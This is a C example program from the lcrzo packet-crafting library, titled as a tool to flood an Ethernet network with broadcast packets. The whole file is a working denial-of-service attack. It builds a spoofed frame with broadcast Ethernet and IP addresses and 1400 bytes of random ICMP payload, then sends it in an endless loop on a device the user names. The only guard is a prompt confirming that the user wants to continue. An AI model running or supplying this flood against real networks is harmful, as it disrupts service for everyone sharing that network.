
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000357=
{ /*reference*/     "lcrzoex", 357,
  /*version*/       1, 0,
  /*title*/         "flood an Ethernet network with broadcast packets",
  /*french title*/  "floode un reseau Ethernet avec des paquets broadcast",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device",
  /*french usage*/  "device",
  /*usage example*/ "eth0",
  /*fr. usage ex.*/ "eth0",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declaration */
int lcrzoex_000357_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000357_main(int argc, char *argv[])
{ lcrzo_device device;
  lcrzo_spoof spoof;
  lcrzo_hdrleth hdreth;
  lcrzo_hdrlip hdrip;
  lcrzo_data data, packet;
  lcrzo_int32 datasize, packetsize; 

  lcrzo_init();
  if ( argc<2 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000357, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize device */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));

  /* ask user if he really wants to continue */
  lcrzo_epr(shared_misc_dangerousexample());

  /* init spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));

  /* create the new Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&hdreth));
  lcrzo_epr(lcrzo_etha_init(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, hdreth.src));
  lcrzo_epr(lcrzo_etha_init(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, hdreth.dst));
  hdreth.type=LCRZO_HDRLETH_TYPE_IP;

  /* create the new IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&hdrip));
  hdrip.saddr=0xFFFFFFFFu;
  hdrip.daddr=0xFFFFFFFFu;
  hdrip.protocol=LCRZO_HDRLIP_PROTOCOL_ICMP;

  /* init fake data */
  datasize=1400;
  lcrzo_epr(lcrzo_data_initm_rand(0, 0xFF, datasize, &data, &datasize));

  /* create the fake packet */
  lcrzo_epr(lcrzo_packet_initm_ethipoptdata(hdreth, hdrip, NULL, 0,
					    data, (lcrzo_uint16)datasize,
					    &packet, &packetsize));
  lcrzo_epr(lcrzo_data_free2(&data));

  /* main loop */
  while (LCRZO_TRUE)
  { lcrzo_epr(lcrzo_spoof_eth(&spoof, device, packet, packetsize));
  }

  /* close everything */
  lcrzo_epr(lcrzo_data_free2(&packet));
  lcrzo_epr(lcrzo_spoof_close(&spoof));
  lcrzo_close();
  return (LCRZO_ERR_OK);
}
